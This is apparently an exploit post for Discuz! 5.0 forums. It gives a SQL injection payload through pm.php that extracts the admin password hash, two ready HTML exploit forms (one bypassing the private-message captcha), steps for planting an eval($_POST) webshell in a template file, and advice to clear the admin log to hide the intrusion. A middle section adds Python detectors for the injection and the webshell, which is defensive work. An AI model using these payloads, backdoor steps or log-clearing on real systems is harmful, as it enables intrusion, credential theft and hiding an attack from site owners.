SQL:
0) union select password,2,0 from cdb_members where uid=1/*
uid=1/*    the 1 here is the user ID value
After obtaining the administrator's MD5 password hash,
go into the admin backend:
Forum Management, Module Edit, Details
edit wap.php and insert
eval($_POST[tlwbw])
Connection address:
site URL + /templates/default/wap.lang.php
Haha, after going through the backend don't forget to clear forumdata/cplog.php
Exploit code, save as .html
The following is the quoted snippet:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>Dz5.0 0day</TITLE>
<META http-equiv=Content-Type content="text/html; charset=utf-8">
<META content="MSHTML 6.00.3790.2858" name=GENERATOR></HEAD>
<BODY>
<STYLE>BODY {
SCROLLBAR-FACE-COLOR: #e4e4f3; FONT-SIZE: 9pt; SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; SCROLLBAR-SHADOW-COLOR: #e4e4f3; COLOR: #000000; SCROLLBAR-3DLIGHT-COLOR: #e4e4f3; SCROLLBAR-ARROW-COLOR: #4444b3; SCROLLBAR-TRACK-COLOR: #efefef; FONT-FAMILY: "Courier New"; SCROLLBAR-DARKSHADOW-COLOR: #9c9cd3
}
TABLE {
BORDER-RIGHT: #d8d8f0 1px; BORDER-TOP: #d8d8f0 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #d8d8f0 1px solid; BORDER-BOTTOM: #d8d8f0 1px; FONT-FAMILY: "Courier New"; BORDER-COLLAPSE: collapse
}
.tr {
FONT-SIZE: 9pt; FONT-FAMILY: "Courier New"; BACKGROUND-COLOR: #e4e4f3; TEXT-ALIGN: center
}
.td {
FONT-SIZE: 9pt; FONT-FAMILY: "Courier New"; BACKGROUND-COLOR: #f9f9fd
}
.warningColor {
FONT-SIZE: 9pt; COLOR: #ff0000; FONT-FAMILY: "Courier New"
}
INPUT {
BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 12px; BORDER-BOTTOM-WIDTH: 1px; COLOR: #000000; FONT-FAMILY: "Courier New"; BORDER-RIGHT-WIDTH: 1px
}
TEXTAREA {
BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 12px; BORDER-BOTTOM-WIDTH: 1px; COLOR: #000000; FONT-FAMILY: "Courier New"; BORDER-RIGHT-WIDTH: 1px
}
A:link {
FONT-SIZE: 9pt; COLOR: #000000; FONT-FAMILY: "Courier New"; TEXT-DECORATION: none
}
TR {
FONT-SIZE: 9pt; LINE-HEIGHT: 18px; FONT-FAMILY: "Courier New"
}
TD {
BORDER-RIGHT: #d8d8f0 1px solid; BORDER-TOP: #d8d8f0 1px; FONT-SIZE: 9pt; BORDER-LEFT: #d8d8f0 1px; BORDER-BOTTOM: #d8d8f0 1px solid; FONT-FAMILY: "Courier New"
}
.trHead {
FONT-SIZE: 9pt; LINE-HEIGHT: 3px; FONT-FAMILY: "Courier New"; BACKGROUND-COLOR: #e4e4f3
}
.inputLogin {
BORDER-RIGHT: #d8d8f0 1px solid; BORDER-TOP: #d8d8f0 1px solid; FONT-SIZE: 9pt; VERTICAL-ALIGN: bottom; BORDER-LEFT: #d8d8f0 1px solid; BORDER-BOTTOM: #d8d8f0 1px solid; FONT-FAMILY: "Courier New"; BACKGROUND-COLOR: #f9f9fd
}
</STYLE>
<TABLE cellSpacing=0 cellPadding=0 width=760 align=center border=0>
<FORM method=post>
<TBODY>
<TR>
<TD class=td height=22> Dz5.0 Exp</TD></TR>
<TR>
<TD class=trHead> </TD></TR>
<TR>
<TD class=td height=18> Url: <INPUT id=theAction
onblur='this.form.the2Action.value=this.form.theAction.value+"/pm.php?action=send&pmsubmit=yes"'
size=50 value=http://www.4evil.org name=theAction><BR><INPUT
id=the2Action type=hidden name=the2Action> Hash: <INPUT
value=0094b488 name=formhash> Msgt<INPUT size=10
value=aspxp name=msgto><BR><INPUT type=hidden size=10 value=aa
name=subject><INPUT type=hidden value=aa name=message> SQL:
<INPUT size=100
value="0) union select password,2,0 from cdb_members where uid=1/*"
name=msgtobuddys[]></TD></TR>
<TR>
<TD class=td align=middle><INPUT onclick=this.form.action=this.form.the2Action.value; type=submit value=" Enter " name=Submit><INPUT type=reset value=" Reset " name=Submit32></TD></TR>
<TR>
<TD class=trHead> </TD></TR>
<TR>
<TD class=td align=right height=22>Just For Fun <A title=QQ:****
href="http://www.****.org">****</A>
2007.3 </TD></TR></FORM></TBODY></TABLE></BODY></HTML>
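Two defensive checks for the issue above, written here as an added example (not part of the original post and not Discuz code): the first parses pm.php POST bodies and flags msgtobuddys[] values that are not plain integer UIDs, the way the form above submits them, and the second scans a template file for eval() of request input, the backdoor shape inserted into wap.lang.php. The sample POST bodies and template contents are constructed, and sanitize_uids is an assumed server-side fix, not the vendor's.

```python
import re
from urllib.parse import parse_qs

# Constructed sample pm.php POST bodies (hypothetical log entries, not from the page).
LEGIT_POST = ("formhash=0094b488&msgto=jackal&subject=aa&message=aa"
              "&msgtobuddys%5B%5D=12&msgtobuddys%5B%5D=34")
INJECTED_POST = ("formhash=0094b488&msgto=jackal&subject=aa&message=aa"
                 "&msgtobuddys%5B%5D=0%29+union+select+password%2C2%2C0"
                 "+from+cdb_members+where+uid%3D1%2F*")

# UNION/SELECT keywords and the /* or -- comment openers used to truncate the query.
SQLI_PATTERN = re.compile(r"\b(union|select)\b|/\*|--", re.IGNORECASE)
# eval() fed directly from request input, the backdoor shape described for wap.lang.php.
WEBSHELL_PATTERN = re.compile(r"\beval\s*\(\s*\$_(POST|GET|REQUEST)\s*\[", re.IGNORECASE)


def check_pm_request(body):
    """Flag msgtobuddys[] values in a pm.php POST body that are not plain integer UIDs."""
    params = parse_qs(body, keep_blank_values=True)
    findings = []
    for value in params.get("msgtobuddys[]", []):
        if not value.isdigit():
            findings.append("non-numeric msgtobuddys[]: %r" % value)
        if SQLI_PATTERN.search(value):
            findings.append("SQL syntax in msgtobuddys[]: %r" % value)
    return findings


def sanitize_uids(values):
    """Assumed server-side fix (not Discuz's own code): keep only positive integer UIDs
    before they are interpolated into the IN (...) clause; everything else is dropped."""
    return sorted({int(v) for v in values if v.strip().isdigit() and int(v) > 0})


def scan_template(source):
    """Return 1-based line numbers of a template file that pass request input to eval()."""
    return [n for n, line in enumerate(source.splitlines(), 1)
            if WEBSHELL_PATTERN.search(line)]


if __name__ == "__main__":
    print(check_pm_request(LEGIT_POST))     # []
    print(check_pm_request(INJECTED_POST))  # two findings for the union payload
    print(sanitize_uids(["12", "0) union select password,2,0 from cdb_members where uid=1/*"]))  # [12]
    print(scan_template("<?php\n$lang = array();\neval($_POST[tlwbw]);\n"))  # [3]
```

Running check_pm_request over recorded POST bodies to pm.php, and scan_template over templates/default/*.php, is enough to spot both stages described in the post.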
Method for getting past the private-message verification code with the PM vulnerability: (source: 7贱's blog)
<HTML><HEAD><TITLE>discuz</TITLE></HEAD>
<BODY>
<a href="http://1v1.name">http://1v1.name</a><FORM name=frm method=post target=_blank>Url: <INPUT
size=45 name=act> <INPUT
size=8 name=formhash> <INPUT onclick="javascript:action=document.all.act.value+'pm.php?action=send';frm.submit();" type=button value="提 交" name=Send><br><br>
MySQL:<INPUT
size=65 value='0) union select password,2,0 from cdb_members where uid=1/*' name=msgtobuddys[]>
<input type="text" name="seccodeverify" size="7">
<INPUT TYPE="hidden" NAME="pmsubmit" value="2">
<input type="hidden" name="subject" value="test">
<input type="hidden" name="message" value="test">
</FORM>
</BODY></HTML>